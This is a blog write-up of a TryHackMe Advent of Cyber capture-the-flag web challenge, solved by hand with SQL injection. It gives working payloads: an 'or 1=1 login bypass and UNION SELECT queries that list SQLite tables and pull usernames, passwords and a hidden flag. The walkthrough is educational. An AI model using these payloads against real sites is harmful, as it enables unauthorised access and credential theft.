<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/assets/css/style.css?v=7ffef42dae26353524a6dbf74721efac859862ec">
    <link rel="shortcut icon" type="image/png" href="http://0.0.0.0:4000/assets/images/shinris3n.png">

<!-- Begin Jekyll SEO tag v2.6.1 -->
<title>Advent of Cyber 2 - Day 5 (Manual Mode) | 当て身 Atemi</title>
<meta name="generator" content="Jekyll v3.9.0" />
<meta property="og:title" content="Advent of Cyber 2 - Day 5 (Manual Mode)" />
<meta name="author" content="shinris3n" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="A Cybersecurity blog by shinris3n 👊 Writeups 👊 News 👊 Resources" />
<meta property="og:description" content="A Cybersecurity blog by shinris3n 👊 Writeups 👊 News 👊 Resources" />
<link rel="canonical" href="http://0.0.0.0:4000/writeups/2020/12/05/TryHackMe-AoC2-Day5.html" />
<meta property="og:url" content="http://0.0.0.0:4000/writeups/2020/12/05/TryHackMe-AoC2-Day5.html" />
<meta property="og:site_name" content="当て身 Atemi" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-12-05T22:12:21-06:00" />
<script type="application/ld+json">
{"headline":"Advent of Cyber 2 - Day 5 (Manual Mode)","url":"http://0.0.0.0:4000/writeups/2020/12/05/TryHackMe-AoC2-Day5.html","dateModified":"2020-12-05T22:12:21-06:00","datePublished":"2020-12-05T22:12:21-06:00","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://0.0.0.0:4000/writeups/2020/12/05/TryHackMe-AoC2-Day5.html"},"author":{"@type":"Person","name":"shinris3n"},"description":"A Cybersecurity blog by shinris3n 👊 Writeups 👊 News 👊 Resources","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

  </head>

  <body>

    <header>
      <div class="container">
        <h1><a href = '/' style = "text-decoration:none;color:#b5e853;" >当て身 Atemi</a></h1>
        <h2>A Cybersecurity blog by shinris3n <br> 👊 <a href = "/writeups">Writeups</a> 👊 <a href = "/news">News</a> 👊 <a href = "/resources">Resources</a> <br></h2>
        <h5>Part of the <a href="https://www.ninpwn.com" target="_blank">Ninpwn</a> Network</h5>
      </div>
    </header>

    <div class="container">
      <a href="http://0.0.0.0:4000"><img src="http://0.0.0.0:4000/assets/images/shinris3n_banner_transparent.png" width="25%" height="25%" alt="shinris3n" title="shinris3n home page link"></a>
      <section id="main_content">
        <h5><a href="#" onclick="history.go(-1)"> &lt;&lt; back </a></h5><br>


<small>5 December 2020</small>
<h1>Advent of Cyber 2 - Day 5 (Manual Mode)</h1>




 <small><font color="b5e853">Challenge Source: <em>TryHackMe</em></font></small>

<br>

  <small><font color="b5e853">Challenge Category: <em>Web Exploitation</em></font></small>


<p><a href="https://tryhackme.com/" target="_blank"><img src="/assets/writeups/TryHackMe/THMlogo.png" width="225" /></a></p>

<h2>Someone stole Santa's gift list!</h2>
<p>Using sqlmap was a nice and straightforward way of solving this challenge, but I was curious how it could be solved manually.  I saw that others were also interested in the AoC2 Discord channel, so I decided to take a crack at it and share a possible solution.</p>

<ul>
  <li>Taking it from the top for the sake of having a complete walkthrough to the Day 5 challenge, this is the page we’re provided with to start:</li>
</ul>

<p><img src="/assets/writeups/TryHackMe/AoC2D5/santas_official_forum_frontpage.png" alt="santas_official_forum_frontpage.png" /></p>

<ul>
  <li>There’s not really much to see in the page source, but as the challenge states to find “Santa’s secret login panel and bypass the login”, we can make some educated guesses (as instructed in the first challenge question) to find the panel at /santapanel:</li>
</ul>

<p><img src="/assets/writeups/TryHackMe/AoC2D5/santapanel.png" alt="santapanel.png" /></p>

<ul>
  <li>A simple and classic SQLi gets us in:</li>
</ul>

<p><code class="language-plaintext highlighter-rouge">'or 1=1--</code></p>

<p><img src="/assets/writeups/TryHackMe/AoC2D5/badboilogin.png" alt="badboilogin.png" /></p>

<ul>
  <li>Just to take a look at what information we have access to upfront, we can get all search button related output by trying a wildcard:</li>
</ul>

<p><img src="/assets/writeups/TryHackMe/AoC2D5/d01b15ca70e045c397034252c2769587.png" alt="37de0ab710e9d480cc41b2ed5193a753.png" /></p>

<ul>
  <li>As for an injection vector, one of the provided resources for this challenge includes a <a href="https://github.com/payloadbox/sql-injection-payload-list" target="_blank">list of generic payloads</a> that we can try out. Here’s one string that yields an error message:</li>
</ul>

<p><img src="/assets/writeups/TryHackMe/AoC2D5/06fa999848894cbd964eeb2da8ec5041.png" alt="fba82e82ee07183820e349147aa9c123.png" /></p>

<ul>
  <li>It looks like this will work, we just need to make a small adjustment because we have 2 output columns:</li>
</ul>

<p><code class="language-plaintext highlighter-rouge">Badboi' UNION SELECT 1, 2--</code></p>

<p><img src="/assets/writeups/TryHackMe/AoC2D5/29f06dd5da49482e9f67fd8114809547.png" alt="031ad161871e6b41493e28d231633b90.png" /></p>

<ul>
  <li>Now we need to leverage this vulnerability to find out what tables are in the database.  We had a hint in the challenge text:</li>
</ul>

<p><code class="language-plaintext highlighter-rouge">Santa's TODO: Look at alternative database systems that are better than sqlite.</code></p>

<ul>
  <li>Based on this, we can assume SQLite is the database that is running.  The search for some payloads that we can adapt is made easier thanks to <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md" target="_blank">another resource shared in the challenge description</a>. Re-working the syntax of the <em>“Integer/String based - Extract table name”</em> payload just a bit:</li>
</ul>

<p><code class="language-plaintext highlighter-rouge">Badboi' UNION SELECT 1, tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--</code></p>

<p><img src="/assets/writeups/TryHackMe/AoC2D5/dd2ff72ac7644a869b52e2842fd71317.png" alt="3a432b4959a9aac3e635618b51163f41.png" /></p>

<ul>
  <li>And then doing the same with a payload for column discovery:</li>
</ul>

<p><code class="language-plaintext highlighter-rouge">BadBoi' UNION SELECT 1, sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='users'--</code></p>

<p><img src="/assets/writeups/TryHackMe/AoC2D5/46fd0eb327d442d6a303186db5e233ab.png" alt="1c5324b827db2a2ea0f7ed1018c3526f.png" /></p>

<ul>
  <li>After doing this for each table, we can output the contents of the details we want to see:</li>
</ul>

<p><code class="language-plaintext highlighter-rouge">BadBoi' UNION SELECT 1, username FROM users--</code></p>

<p><img src="/assets/writeups/TryHackMe/AoC2D5/080978b7226f40b6964ca21d86c4260d.png" alt="0bdc0e71277868101f7c77e063bf562e.png" /></p>

<p><code class="language-plaintext highlighter-rouge">BadBoi' UNION SELECT 1, password FROM users--</code></p>

<p><img src="/assets/writeups/TryHackMe/AoC2D5/ba3b17ac13b546db8a400c979b7bd644.png" alt="2a4d9996142daa35fd8ac35f9258056c.png" /></p>

<ul>
  <li>In a more targeted fashion that might have been useful in other situations:</li>
</ul>

<p><code class="language-plaintext highlighter-rouge">BadBoi' UNION ALL SELECT NULL, password FROM users WHERE username LIKE 'Admin' --</code></p>

<p><img src="/assets/writeups/TryHackMe/AoC2D5/49a29d9f490f42e6bdad559338426d66.png" alt="d9f814e92318bf197fa8e1369ee879d1.png" /></p>

<ul>
  <li>or</li>
</ul>

<p><code class="language-plaintext highlighter-rouge">BadBoi' UNION SELECT 1, kid FROM sequels WHERE title LIKE '%Try%' --</code></p>

<p><img src="/assets/writeups/TryHackMe/AoC2D5/6319907a5e6346239668f91a4c1c26e3.png" alt="2538f2ad6752664f59a38c8bf769565b.png" /></p>

<ul>
  <li>and in the case of the challenge we also specifically want:</li>
</ul>

<p><code class="language-plaintext highlighter-rouge">BadBoi' UNION SELECT 1, flag FROM hidden_table --</code></p>

<p><img src="/assets/writeups/TryHackMe/AoC2D5/b9d2ecbcf5b643a3ac05bfc94c3a85dc.png" alt="a7b2d6fdbc6a1a55e416899387936018.png" /></p>

<p>It was worth taking the extra time to solve the challenge this way, and I definitely appreciate sqlmap for all it automates and how it formats things a lot more now.</p>



  <small>Tags: <em>TryHackMe</em></small>


      </section>
    </div>

    
  </body>
</html>
